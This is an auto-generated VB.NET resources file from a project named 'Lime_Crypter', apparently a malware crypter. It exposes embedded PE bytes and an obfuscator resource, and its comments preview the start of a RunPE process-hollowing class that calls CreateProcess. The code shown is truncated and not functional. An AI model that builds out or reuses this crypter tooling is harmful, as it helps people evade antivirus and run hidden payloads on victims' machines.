'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.42000
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "15.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("Lime_Crypter.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property dotNET_Reactor1() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("dotNET_Reactor1", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property nyancat() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("nyancat", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property PE() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("PE", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to 
        '''Imports System.Threading
        '''Imports System.Reflection
        '''Imports System.Text
        '''Imports System.Security
        ''' 
        '''&apos;------------------
        '''&apos;Creator: aeonhack
        '''&apos;Site: elitevs.net
        '''&apos;Created: 02/15/2013
        '''&apos;Changed: 05/12/2013
        '''&apos;Version: 1.0.0.7
        '''&apos;------------------
        ''' 
        '''Class RunPE
        ''' 
        '''    &lt;DllImport(&quot;kernel32.dll&quot;, EntryPoint:=&quot;CreateProcess&quot;, CharSet:=CharSet.Unicode), SuppressUnmanagedCodeSecurity&gt; _
        '''    Private Shared Function CreateProcess( _
        '''    ByVal applicationName As String, _
        '''    ByVal commandLine As String, _
        '''  [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property PE_Source() As String
            Get
                Return ResourceManager.GetString("PE_Source", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Imports System, Microsoft.VisualBasic
        '''Imports Microsoft.Win32
        '''Imports System.Windows
        '''Imports System.Windows.Forms
        '''Imports System.Reflection
        '''Imports System.Text
        '''Imports System.Security.Cryptography
        '''Imports System.IO.Compression
        '''Imports System.IO
        '''Imports System.Diagnostics
        '''Imports System.Runtime.InteropServices
        '''Imports System.Collections
        '''Imports System.Collections.Generic
        '''Imports System.Data
        '''
        '''&apos;%ASSEMBLY%&lt;Assembly: AssemblyTitle(&quot;%Title%&quot;)&gt; 
        '''&apos;%ASSEMBLY%&lt;Assembly: AssemblyDescription(&quot;%Descripti [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Source() As String
            Get
                Return ResourceManager.GetString("Source", resourceCulture)
            End Get
        End Property
    End Module
End Namespace
